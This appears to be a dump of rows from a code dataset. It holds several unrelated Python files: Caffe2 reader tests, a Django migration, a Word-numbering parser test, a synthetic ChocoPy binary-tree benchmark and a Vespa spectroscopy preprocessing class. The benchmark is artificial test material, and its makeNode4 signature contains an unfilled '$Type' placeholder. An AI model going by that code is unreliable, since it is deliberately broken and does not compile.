subschema = Struct(('top_level', schema.int_lists.values))
int_list_contents = contents.int_lists.values.field_names()
self.assertEquals(len(subschema.field_names()), len(int_list_contents))
"""
7. Random Access a dataset
"""
read_init_net = core.Net('read_init')
read_next_net = core.Net('read_next')
idx = np.array([2, 1, 0])
indices_blob = Const(read_init_net, idx, name='indices')
reader = ds.random_reader(read_init_net, indices_blob)
reader.computeoffset(read_init_net)
should_stop, batch = reader.read_record(read_next_net)
workspace.CreateNet(read_init_net, True)
workspace.RunNetOnce(read_init_net)
workspace.CreateNet(read_next_net, True)
for i in range(len(entries)):
k = idx[i] if i in idx else i
entry = entries[k]
workspace.RunNet(str(read_next_net))
actual = FetchRecord(batch)
_assert_records_equal(actual, entry)
workspace.RunNet(str(read_next_net))
self.assertEquals(True, workspace.FetchBlob(should_stop))
"""
8. Random Access a dataset with loop_over = true
"""
read_init_net = core.Net('read_init')
read_next_net = core.Net('read_next')
idx = np.array([2, 1, 0])
indices_blob = Const(read_init_net, idx, name='indices')
reader = ds.random_reader(read_init_net, indices_blob, loop_over=True)
reader.computeoffset(read_init_net)
should_stop, batch = reader.read_record(read_next_net)
workspace.CreateNet(read_init_net, True)
workspace.RunNetOnce(read_init_net)
workspace.CreateNet(read_next_net, True)
for _ in range(len(entries) * 3):
workspace.RunNet(str(read_next_net))
self.assertEquals(False, workspace.FetchBlob(should_stop))
"""
9. Sort and shuffle a dataset
This sort the dataset using the score of a certain column,
and then shuffle within each chunk of size batch_size * shuffle_size
before shuffling the chunks.
"""
read_init_net = core.Net('read_init')
read_next_net = core.Net('read_next')
reader = ds.random_reader(read_init_net)
reader.sort_and_shuffle(read_init_net, 'int_lists:lengths', 1, 2)
reader.computeoffset(read_init_net)
should_continue, batch = reader.read_record(read_next_net)
workspace.CreateNet(read_init_net, True)
workspace.RunNetOnce(read_init_net)
workspace.CreateNet(read_next_net, True)
expected_idx = np.array([2, 1, 0])
for i in range(len(entries)):
k = expected_idx[i] if i in expected_idx else i
entry = entries[k]
workspace.RunNet(str(read_next_net))
actual = FetchRecord(batch)
_assert_records_equal(actual, entry)
def test_last_n_window_ops(self):
collect_net = core.Net('collect_net')
collect_net.GivenTensorFill(
[],
'input',
shape=[3, 2],
values=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0],
)
input_array =\
np.array(list(range(1, 7)), dtype=np.float32).reshape(3, 2)
workspace.CreateBlob('output')
workspace.FeedBlob('next', np.array(0, dtype=np.int32))
collect_net.LastNWindowCollector(
['output', 'next', 'input'],
['output', 'next'],
num_to_collect=7,
)
plan = core.Plan('collect_data')
plan.AddStep(
core.execution_step('collect_data', [collect_net],
num_iter=1)
)
workspace.RunPlan(plan)
reference_result = workspace.FetchBlob('output')
npt.assert_array_equal(input_array, reference_result)
plan = core.Plan('collect_data')
plan.AddStep(
core.execution_step('collect_data', [collect_net],
num_iter=2)
)
workspace.RunPlan(plan)
reference_result = workspace.FetchBlob('output')
npt.assert_array_equal(input_array[[1, 2, 2, 0, 1, 2, 0]],
reference_result)
plan = core.Plan('collect_data')
plan.AddStep(
core.execution_step('collect_data', [collect_net],
num_iter=3)
)
workspace.RunPlan(plan)
reference_result = workspace.FetchBlob('output')
npt.assert_array_equal(input_array[[2, 0, 1, 2, 2, 0, 1]],
reference_result)
def test_collect_tensor_ops(self):
init_net = core.Net('init_net')
blobs = ['blob_1', 'blob_2', 'blob_3']
bvec_map = {}
ONE = init_net.ConstantFill([], 'ONE', shape=[1, 2], value=1)
for b in blobs:
init_net.ConstantFill([], [b], shape=[1, 2], value=0)
bvec_map[b] = b + '_vec'
init_net.CreateTensorVector([], [bvec_map[b]])
reader_net = core.Net('reader_net')
for b in blobs:
reader_net.Add([b, ONE], [b])
collect_net = core.Net('collect_net')
num_to_collect = 1000
max_example_to_cover = 100000
bvec = [bvec_map[b] for b in blobs]
collect_net.CollectTensor(
bvec + blobs,
bvec,
num_to_collect=num_to_collect,
)
print('Collect Net Proto: {}'.format(collect_net.Proto()))
plan = core.Plan('collect_data')
plan.AddStep(core.execution_step('collect_init', init_net))
plan.AddStep(
core.execution_step(
'collect_data', [reader_net, collect_net],
num_iter=max_example_to_cover
)
)
workspace.RunPlan(plan)
# concat the collected tensors
concat_net = core.Net('concat_net')
bconcated_map = {}
bsize_map = {}
for b in blobs:
bconcated_map[b] = b + '_concated'
bsize_map[b] = b + '_size'
concat_net.ConcatTensorVector([bvec_map[b]], [bconcated_map[b]])
concat_net.TensorVectorSize([bvec_map[b]], [bsize_map[b]])
workspace.RunNetOnce(concat_net)
# check data
reference_result = workspace.FetchBlob(bconcated_map[blobs[0]])
self.assertEqual(
reference_result.shape,
(min(num_to_collect, max_example_to_cover), 2)
)
size = workspace.FetchBlob(bsize_map[blobs[0]])
self.assertEqual(tuple(), size.shape)
self.assertEqual(min(num_to_collect, max_example_to_cover), size.item())
hist, _ = np.histogram(
reference_result[:, 0],
bins=10,
range=(1, max_example_to_cover)
)
print('Sample histogram: {}'.format(hist))
self.assertTrue(all(hist > 0.6 * (num_to_collect / 10)))
for i in range(1, len(blobs)):
result = workspace.FetchBlob(bconcated_map[blobs[i]])
self.assertEqual(reference_result.tolist(), result.tolist())
if __name__ == "__main__":
import unittest
unittest.main()
| [
"[email protected]"
]
| |
3a0aa4f6f46d50f9055d2000d1b39488f5c19f87 | b341a8d120737297aa8fd394a23633dac9b5ccda | /accounts/migrations/0007_auto_20210122_1129.py | c7476e71ff6f0746f30db617c468bd59bbe23d1c | []
| no_license | Minari766/disney_side_stories | 16d97cb02bf00aa5439d59f753abb9a4706a30aa | aa2d88b1b0fdd87a27f41318bd3ec7352229b6ff | refs/heads/main | 2023-08-15T07:03:16.922579 | 2021-10-03T07:47:22 | 2021-10-03T07:47:22 | 306,496,250 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 445 | py | # Generated by Django 2.2 on 2021-01-22 02:29
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0006_auto_20210122_0127'),
]
operations = [
migrations.AlterField(
model_name='customuser',
name='icon',
field=models.ImageField(blank=True, null=True, upload_to='images', verbose_name='アイコン'),
),
]
| [
"[email protected]"
]
| |
436645c364f840999119d1e57184125dbceeca14 | 1f006f0c7871fcde10986c4f5cec916f545afc9f | /apps/ice/plugins/oxml/oxml_wordNumbering_test.py | 9d73299a89601ac0dd3e3d023fcdc93ea3e7a208 | []
| no_license | ptsefton/integrated-content-environment | 248b8cd29b29e8989ec1a154dd373814742a38c1 | c1d6b5a1bea3df4dde10cb582fb0da361dd747bc | refs/heads/master | 2021-01-10T04:46:09.319989 | 2011-05-05T01:42:52 | 2011-05-05T01:42:52 | 36,273,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,070 | py | #!/usr/bin/env python
#
# Copyright (C) 2010 Distance and e-Learning Centre,
# University of Southern Queensland
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
from unittest import TestCase
import sys
from oxml_wordNumbering import WordNumbering
testFile = "testData/numbering.xml"
class WordNumberingTest(TestCase):
def setUp(self):
f = open(testFile, "rb")
self.wordNumberingXmlStr = f.read()
f.close()
def tearDown(self):
pass
def testGetNumLevelInfo(self):
#word/numbering.xml
wordNum = WordNumbering(self.wordNumberingXmlStr)
numId = "1"
level = "0"
info = wordNum.getNumLevelInfo(numId, level)
expected = {'leftIndent': u'720', 'start': u'1', 'jc': u'left',
'text': u'%1.', 'format': u'decimal'}
self.assertEquals(info, expected)
def runUnitTests(locals):
print "\n\n\n\n"
if sys.platform=="cli":
import clr
import System.Console
System.Console.Clear()
print "---- Testing under IronPython ----"
else:
print "---- Testing ----"
# Run only the selected tests
args = list(sys.argv)
sys.argv = sys.argv[:1]
args.pop(0)
runTests = args
runTests = [ i.lower().strip(", ") for i in runTests]
runTests = ["test"+i for i in runTests if not i.startswith("test")] + \
[i for i in runTests if i.startswith("test")]
if runTests!=[]:
testClasses = [i for i in locals.values() \
if hasattr(i, "__bases__") and \
(TestCase in i.__bases__)]
testing = []
for x in testClasses:
l = dir(x)
l = [ i for i in l if i.startswith("test") and callable(getattr(x, i))]
for i in l:
if i.lower() not in runTests:
delattr(x, i)
else:
testing.append(i)
x = None
num = len(testing)
if num<1:
print "No selected tests found! - %s" % str(args)[1:-1]
elif num==1:
print "Running selected test - %s" % (str(testing)[1:-1])
else:
print "Running %s selected tests - %s" % (num, str(testing)[1:-1])
from unittest import main
main()
if __name__=="__main__":
runUnitTests(locals())
sys.exit(0)
| [
"[email protected]@110e3293-9ef9-cb8f-f479-66bdb1942d05"
]
| [email protected]@110e3293-9ef9-cb8f-f479-66bdb1942d05 |
199d434465c3656aee4f794b9c3e45082973e134 | c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c | /cases/synthetic/tree-big-7896.py | b9db85cffe8ae7ce8835bf3307e75b65eb9792ec | []
| no_license | Virtlink/ccbench-chocopy | c3f7f6af6349aff6503196f727ef89f210a1eac8 | c7efae43bf32696ee2b2ee781bdfe4f7730dec3f | refs/heads/main | 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,291 | py | # Binary-search trees
class TreeNode(object):
value:int = 0
left:"TreeNode" = None
right:"TreeNode" = None
def insert(self:"TreeNode", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode(x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode(x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode2(object):
value:int = 0
value2:int = 0
left:"TreeNode2" = None
left2:"TreeNode2" = None
right:"TreeNode2" = None
right2:"TreeNode2" = None
def insert(self:"TreeNode2", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode2(x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode2(x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode2", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode2(x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode2(x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode2", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode2", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode3(object):
value:int = 0
value2:int = 0
value3:int = 0
left:"TreeNode3" = None
left2:"TreeNode3" = None
left3:"TreeNode3" = None
right:"TreeNode3" = None
right2:"TreeNode3" = None
right3:"TreeNode3" = None
def insert(self:"TreeNode3", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode3", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode3", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode3", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode4(object):
value:int = 0
value2:int = 0
value3:int = 0
value4:int = 0
left:"TreeNode4" = None
left2:"TreeNode4" = None
left3:"TreeNode4" = None
left4:"TreeNode4" = None
right:"TreeNode4" = None
right2:"TreeNode4" = None
right3:"TreeNode4" = None
right4:"TreeNode4" = None
def insert(self:"TreeNode4", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode4", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode4", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode4", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode5(object):
value:int = 0
value2:int = 0
value3:int = 0
value4:int = 0
value5:int = 0
left:"TreeNode5" = None
left2:"TreeNode5" = None
left3:"TreeNode5" = None
left4:"TreeNode5" = None
left5:"TreeNode5" = None
right:"TreeNode5" = None
right2:"TreeNode5" = None
right3:"TreeNode5" = None
right4:"TreeNode5" = None
right5:"TreeNode5" = None
def insert(self:"TreeNode5", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode5", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode5", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode5", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class Tree(object):
root:TreeNode = None
size:int = 0
def insert(self:"Tree", x:int) -> object:
if self.root is None:
self.root = makeNode(x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree2(object):
root:TreeNode2 = None
root2:TreeNode2 = None
size:int = 0
size2:int = 0
def insert(self:"Tree2", x:int) -> object:
if self.root is None:
self.root = makeNode2(x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree2", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode2(x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree2", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree2", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree3(object):
root:TreeNode3 = None
root2:TreeNode3 = None
root3:TreeNode3 = None
size:int = 0
size2:int = 0
size3:int = 0
def insert(self:"Tree3", x:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree3", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree3", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree3", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree3", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree3", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree4(object):
root:TreeNode4 = None
root2:TreeNode4 = None
root3:TreeNode4 = None
root4:TreeNode4 = None
size:int = 0
size2:int = 0
size3:int = 0
size4:int = 0
def insert(self:"Tree4", x:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree4", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree4", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree4", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree4", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree4", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree5(object):
root:TreeNode5 = None
root2:TreeNode5 = None
root3:TreeNode5 = None
root4:TreeNode5 = None
root5:TreeNode5 = None
size:int = 0
size2:int = 0
size3:int = 0
size4:int = 0
size5:int = 0
def insert(self:"Tree5", x:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree5", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree5", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree5", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree5", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree5", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def makeNode(x: int) -> TreeNode:
b:TreeNode = None
b = TreeNode()
b.value = x
return b
def makeNode2(x: int, x2: int) -> TreeNode2:
b:TreeNode2 = None
b2:TreeNode2 = None
b = TreeNode2()
b.value = x
return b
def makeNode3(x: int, x2: int, x3: int) -> TreeNode3:
b:TreeNode3 = None
b2:TreeNode3 = None
b3:TreeNode3 = None
b = TreeNode3()
b.value = x
return b
def makeNode4(x: int, x2: int, x3: $Type, x4: int) -> TreeNode4:
b:TreeNode4 = None
b2:TreeNode4 = None
b3:TreeNode4 = None
b4:TreeNode4 = None
b = TreeNode4()
b.value = x
return b
def makeNode5(x: int, x2: int, x3: int, x4: int, x5: int) -> TreeNode5:
b:TreeNode5 = None
b2:TreeNode5 = None
b3:TreeNode5 = None
b4:TreeNode5 = None
b5:TreeNode5 = None
b = TreeNode5()
b.value = x
return b
# Input parameters
n:int = 100
n2:int = 100
n3:int = 100
n4:int = 100
n5:int = 100
c:int = 4
c2:int = 4
c3:int = 4
c4:int = 4
c5:int = 4
# Data
t:Tree = None
t2:Tree = None
t3:Tree = None
t4:Tree = None
t5:Tree = None
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
k:int = 37813
k2:int = 37813
k3:int = 37813
k4:int = 37813
k5:int = 37813
# Crunch
t = Tree()
while i < n:
t.insert(k)
k = (k * 37813) % 37831
if i % c != 0:
t.insert(i)
i = i + 1
print(t.size)
for i in [4, 8, 15, 16, 23, 42]:
if t.contains(i):
print(i)
| [
"[email protected]"
]
| |
bd64520533edfc4080a9c62fe2f73533c225df98 | 952a9bc5a54bae037662f3bd5e09aa13780628a2 | /vespa/analysis/block_prep_megalaser.py | d9ee800348907f04ad9ee6a673913aebdecb9e0a | [
"BSD-3-Clause"
]
| permissive | bsoher/vespa_py2 | 199964d2ffdc6ed576d6d73e55078ed5bc26c784 | 07cd67de2465607319870a18435da784345198d0 | refs/heads/main | 2023-04-22T04:24:44.270731 | 2021-05-06T01:07:57 | 2021-05-06T01:07:57 | 364,384,405 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,109 | py | # Python modules
from __future__ import division
# 3rd party modules
import numpy as np
import xml.etree.cElementTree as ElementTree
# Our modules
import vespa.analysis.block_prep_identity as block_prep_identity
import vespa.analysis.chain_prep_megalaser as chain_prep_megalaser
import vespa.analysis.block as block
import vespa.common.util.xml_ as util_xml
import vespa.common.util.misc as util_misc
import vespa.common.constants as common_constants
import vespa.common.mrs_data_raw as mrs_data_raw
from vespa.common.constants import Deflate
class _Settings(object):
# The XML_VERSION enables us to change the XML output format in the future
XML_VERSION = "1.0.0"
def __init__(self, attributes=None):
"""
Currently there are no input parameters set in this object. This may
change in the future, or this object may serve as a base class for
other "raw" types of data objects that need to do a bit of massaging
of the data as it comes in (e.g. align and sum individual FIDs for
an SVS data set).
"""
self.fid_left_shift = 0
self.gaussian_apodization = 2.0
self.global_phase1 = 0.0
self.apply_peak_shift = True
self.reference_peak_center = 2.01
self.peak_search_width = 0.2
self.fid_left_shift_b0 = 56
self.apply_phase0 = True
self.phase0_range_start = 2.2
self.phase0_range_end = 1.8
self.fid_left_shift_phase0 = 56
self.ref_spectrum_source = 'singlet_centered_in_range'
self.ref_peak_line_width = 18
self.constant_phase0_offset = 70 # degrees
if attributes is not None:
self.inflate(attributes)
def __str__(self):
return self.__unicode__().encode("utf-8")
def __unicode__(self):
lines = [ ]
lines.append("--- Block Preprocess Megalaser Settings ---")
lines.append("fid_left_shift : " + unicode(self.fid_left_shift))
lines.append("gaussian_apodization : " + unicode(self.gaussian_apodization))
lines.append("apply_peak_shift : " + unicode(self.apply_peak_shift))
lines.append("reference_peak_center : " + unicode(self.reference_peak_center))
lines.append("peak_search_width : " + unicode(self.peak_search_width))
lines.append("fid_left_shift_b0 : " + unicode(self.fid_left_shift_b0))
lines.append("apply_phase0 : " + unicode(self.apply_phase0))
lines.append("phase0_range_start : " + unicode(self.phase0_range_start))
lines.append("phase0_range_end : " + unicode(self.phase0_range_end))
lines.append("fid_left_shift_phase0 : " + unicode(self.fid_left_shift_phase0))
lines.append("ref_spectrum_source : " + unicode(self.ref_spectrum_source))
lines.append("ref_peak_line_width : " + unicode(self.ref_peak_line_width))
lines.append("constant_phase0_offset : " + unicode(self.constant_phase0_offset))
# __unicode__() must return a Unicode object. In practice the code
# above always generates Unicode, but we ensure it here.
return u'\n'.join(lines)
def deflate(self, flavor=Deflate.ETREE):
if flavor == Deflate.ETREE:
e = ElementTree.Element("settings", {"version" : self.XML_VERSION})
util_xml.TextSubElement(e, "fid_left_shift", self.fid_left_shift)
util_xml.TextSubElement(e, "gaussian_apodization", self.gaussian_apodization)
util_xml.TextSubElement(e, "global_phase1", self.global_phase1)
util_xml.TextSubElement(e, "apply_peak_shift", self.apply_peak_shift)
util_xml.TextSubElement(e, "reference_peak_center", self.reference_peak_center)
util_xml.TextSubElement(e, "peak_search_width", self.peak_search_width)
util_xml.TextSubElement(e, "fid_left_shift_b0", self.fid_left_shift_b0)
util_xml.TextSubElement(e, "apply_phase0", self.apply_phase0)
util_xml.TextSubElement(e, "phase0_range_start", self.phase0_range_start)
util_xml.TextSubElement(e, "phase0_range_end", self.phase0_range_end)
util_xml.TextSubElement(e, "fid_left_shift_phase0", self.fid_left_shift_phase0)
util_xml.TextSubElement(e, "ref_spectrum_source", self.ref_spectrum_source)
util_xml.TextSubElement(e, "ref_peak_line_width", self.ref_peak_line_width)
util_xml.TextSubElement(e, "constant_phase0_offset", self.constant_phase0_offset)
return e
elif flavor == Deflate.DICTIONARY:
return self.__dict__.copy()
def inflate(self, source):
if hasattr(source, "makeelement"):
# Quacks like an ElementTree.Element
for name in ("reference_peak_center",
"gaussian_apodization",
"peak_search_width",
"global_phase1",
'phase0_range_start',
'phase0_range_end'):
item = source.findtext(name)
if item is not None:
setattr(self, name, float(item))
for name in ("fid_left_shift",
"fid_left_shift_b0",
"fid_left_shift_phase0",
"ref_peak_line_width",
"constant_phase0_offset"):
item = source.findtext(name)
if item is not None:
setattr(self, name, int(item))
for name in ("apply_peak_shift",
"apply_phase0", ):
item = source.findtext(name)
if item is not None:
setattr(self, name, util_xml.BOOLEANS[item])
for name in ("ref_spectrum_source",):
item = source.findtext(name)
if item is not None:
setattr(self, name, item)
elif hasattr(source, "keys"):
# Quacks like a dict
for key in source.keys():
if hasattr(self, key):
setattr(self, key, source[key])
class BlockPrepMegalaser(block_prep_identity.BlockPrepIdentity):
"""
This is a building block object that can be used to create a list of
processing blocks.
This object represents preprocessing of the raw data from the first
block ('raw') in the dataset.blocks list.
We sub-class from BlockPrepIdentity base class to minimize recreating
wheels, but to also leave us the flexibility of extending this class
in the future for any 'special children' types of data loading.
In here we also package all the functionality needed to save and recall
these values to/from an XML node.
"""
# The XML_VERSION enables us to change the XML output format in the future
